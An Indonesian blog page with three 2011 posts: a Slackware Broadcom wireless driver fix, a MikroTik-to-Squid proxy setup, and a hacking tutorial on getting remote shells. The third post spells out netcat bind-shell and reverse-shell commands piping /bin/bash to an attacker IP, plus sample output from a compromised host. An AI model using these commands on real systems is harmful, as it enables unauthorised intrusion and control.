Kamis, 24 Maret 2011
di
02.09
|
kadang trjadi saat mnginstal paket wireless driver pada OS Slackware. dalam contoh ini kasus brikut terjadi pada wireless vendoran Broadcom.
ok lngusng saja. download packet driver trus ekstrack lalu dicompile saja...... selesaikan. heheheh... tunggu dulu. untuk linux lain mngkin langkahx ckup bgitu saja misalx d ubuntu. tp ini beda. sesudah mngcompile paket driverx tadi, kita harus me-load modulnya agar dapat bekerja.
printahx:
Code:
sudo modprobe lib80211 sudo insmod wl.ko
setelah itu kita copy module yang sudah dicompile tadi ke direktory /lib. atau bisa mnggunakan printah:
Code:
sudo cp wl.ko /lib/modules/`uname -r`/kernel/drivers/net/wireless
tambahkan command :
Code:
modprobe wl
pada file /etc/rc.d/rc.local.
untuk memastikan smuax sdah jalan dan sukses. coba restar (buat down trus up lagi) wireless nya.
semoga bermanfaat.
Diposting oleh
*
Label:
komputer,
Linux,
tutorial
Minggu, 13 Maret 2011
di
14.37
|
slamat malam. tudepoin saja.
berikut merupakan settingan simple dan mngkin benar2 simple untuk konfigurasi mesin mikrotik dan squid sbagai proxy.
topologix sperti berikut : internet -- Mikrotik -- SQUID -- Client
dmna SQUID digunakan sbagai bandwith management
yg dibuthkan
1. Mikrotik box dengan 3 ethernet card yg akan digunakan untuk ether1 sebagai publik, ether2 sebagai lan, dan ether3 sbagai proxy (mnuju squid).
2. Squid box
konfigurasi awal :
1. Mikrotik Box : * publik ip 192.168.1.2/30 dengan gateway 192..168.1.1, (ip modem) * proxy ip 192.168.0.1/30, * lan ip 192.168.10.1/24,
2. Squid Box : * set dengan ip 192.168.0.2/30 * port 8080
lngsung saja lngkahx :
1. Setting WebProxy pada mikrotik:
================================================================ [Meonkzt@MARS] > /ip web-proxy print enabled: no src-address: 0.0.0.0 port: 3128 hostname: "proxy" transparent-proxy: no parent-proxy: 0.0.0.0:0 cache-administrator: "webmaster" max-object-size: 4096KiB cache-drive: system max-cache-size: none max-ram-cache-size: unlimited status: stopped reserved-for-cache: 0KiB reserved-for-ram-cache: 29696KiB ===============================================================
=============================================================== [Meonkzt@MARS] > /ip web-proxy set enabled=yes hostname="proxy" transparent-proxy=yes parent-proxy=192.168.0.2:8080 cache-administrator="meonkz" max-ram-cache-size=none enabled=yes ===============================================================
=============================================================== [Meonkzt@MARS] > /ip web-proxy print enabled: yes src-address: 0.0.0.0 port: 3128 hostname: "proxy" transparent-proxy: yes parent-proxy: 192.168.0.2:8080 cache-administrator: "meonkz" max-object-size: 4096KiB cache-drive: system max-cache-size: none max-ram-cache-size: none status: running reserved-for-cache: 0KiB reserved-for-ram-cache: 29696KiB ==============================================================
2. Setting NAT dmna port 80 akan diredirect ke webproxy.
============================================================== [Meonkzt@MARS] > /ip firewall nat add action=redirect chain=dstnat src-address=192.168.10.0/24 protocol=tcp dst-port=80 to-ports=3128 in-interface=lan ==============================================================
3. selesai. hehehehhe... simple kan..
semoga bemanfaat.
thanks.
Selasa, 01 Maret 2011
di
06.13
|
Apa itu remote connection? Dalam judul aku menuliskan “Interactive Console” dalam tanda kurung. Iya, memang ini yang aq maksud. Remote connection adalah koneksi jarak jauh ke suatu host/komputer dengan mendapatkan sebuah console interaktif dari komputer yang kita remote melalui port tertentu yang telah dibuka. Jadi seakan-akan kita berada langsung di depan komputer yang kita remote dan kita membuka aplikasi console. Namun dalam hal ini, kita berada di jarak jauh dan menggunakan komputer kita,sedangkan console yang kita dapatkan, terkoneksi secara langsung ke komputer sasaran, sehingga command-command yg kita ketik-kan di kirim langsung ke komputer sasaran, inilah interactive console.
Get Console !! Mendapatkan interaktif console sangat penting dalam melakukan hacking. Selain kecepatan danketepatan, kita juga lebih leluasa mengirimkan perintah ke komputer sasaran, lebih leluasa, lebih bebas, dan sedikit log. Dengan interaktif console, kita bisa meloncat ke session lain dalam komputer yang sama, misal untuk login ke mysql server, root exploit, dll.
Banyak cara, teknik, metode, jurus, trik, maupun strategi untuk mendapatkan console jarak jauh. Mulai dari melalui webshell, RCE, LFI, RFI, atau dengan mengirim ninja ke komputer sasaran untuk membantu kita melakukan remote connection.
Ada 2 cara yang bisa kita lakukan untuk mendapatkan console interaktif ini. Yaitu bindshell, dan backconnect.
BindShell Bindshell adalah membuka port (binding) pada komputer korban dengan mengikutkan service/aplikasi yang akan melayani koneksi yang di terima dari port yg di buka. Umumnya aplikasi yang di pakai adalah /bin/bash. Sehingga ketika terjadi koneksi ke port yg di buka, maka komputer korban akan menjalankan aplikasi /bin/bash dan meluncurkannya kepada attacker. Disebut bindshell karena bind di lakukan dengan memberikan service shell (/bin/bash). Dengan demikian, attacker yg melakukan koneksi ke port yg di bind tersebut, akan mendapatkan /bin/bash dari komputer korban. It is a interactive console.
# BindShell dengan NetCat Dengan netcat, kita bisa membuka port dengan membuat listening port di komputer korban. Attribut –l di sertakan pada command netcat untuk membuat listening port.
nc –v –l –p [port] –e [service/aplikasi]
contoh : ./nc –v –l –p 4444 –e /bin/bash &
-v : volume. Menunjukkan volume server ketika terjadi koneksi. -l : listening mode (menunggu koneksi) -p : open port -e : set service/aplication
Setelah shell berhasil opening port (listening port) kita tembak dr PC kita dengan cara
nc –vv [ip shell] [port]
BackConnect Backconnect adalah melakukan remote dari komputer sasaran ke komputer kita. Kalau tadi bindshell adalah remote dari komputer kita ke komputer sasaran, kalau backconnect di balik, dari komputer sasaran ke komputer kita. Backconnect adalah sebuah alternatif bila bindshell gagal, ntah karena gak punya akses, denied akses, sekurity dari firewall, atau karena komputer sasaran tertutup oleh proxy server (komputer sasaran berada di dalam network yang tertutup oleh proxy). Bila ada proxy di depan komputer sasaran, walau bind berhasil, namun kita tetap tidak bisa melakukan remote konek ke sasaran karena tertutup komputer proxy.
Ketika kita melakukan koneksi, maka koneksi kita akan di tolak karena port yg kita tuju tidak terbuka di firewall. Firewall menolak semua koneksi/request ke port yang tidak dibuka di firewall tersebut. Paket-paket berisi request yang di kirim oleh attacker tidak bisa melewati dinding firewall karena memang jalur tidak terbuka, sehingga request koneksi tidak pernah sampai di komputer sasaran.
# Backconnnect dengan Netcat Untuk bisa melakukan backconnect, maka ip yang kita pakai haruslah ip public, atau ip yang terkoneksi langsung ke internet tanpa penghalang proxy.. Cara melakukan backconnect sangat mudah, semudah bindshell. Yang perlu kita lakukan pertama kali adalah set mode listening di komputer kita. Hanya set mode listening, tanpa aplikasi apapun, karena kita akan menerima aplikasi yang diluncurkan oleh kompi sasaran.
[root@localhost][/root] nc -vlp 6888 listening on [any] 6888 ...
Kompi kita udah listening. Berikutnya kita koneksikan komputer sasaran ke komputer kita dengan meluncurkan aplikasi /bin/bash. Seperti biasa, harus ada netcat di kompi sasaran. Downloadkan dulu netcat ke kompi sasaran. Simpan di direktory yg writeable. Atau langsung aja ke /tmp. Command untuk backconnect adalah:
nc –vv [ip attacker] [port] –e [launch aplication]
contoh : ./nc –vv 192.168.10.20 6888 –e /bin/bash
Setelah menjalankan command tersebut di komputer sasaran, sekarang lihatlah komputer kita. Kita sudah mendapatkan koneksi balik dari komputer sasaran dan langsung menerima aplikasi yg diluncurkan oleh komputer sasaran ke komputer kita.
[root@localhost][/root] nc -vlp 6888 listening on [any] 6888 ... connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 43886 id uid=48(nobody) gid=48(nobody) groups=48(nobody) uname –a Linux astra.2014.ws 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86 _64 x86_64 GNU/Linux
* tulisan yg d bold nerupakan perintah yg kita ketikkan.
credits: Gameover 'n Array
|
Chat Widget
|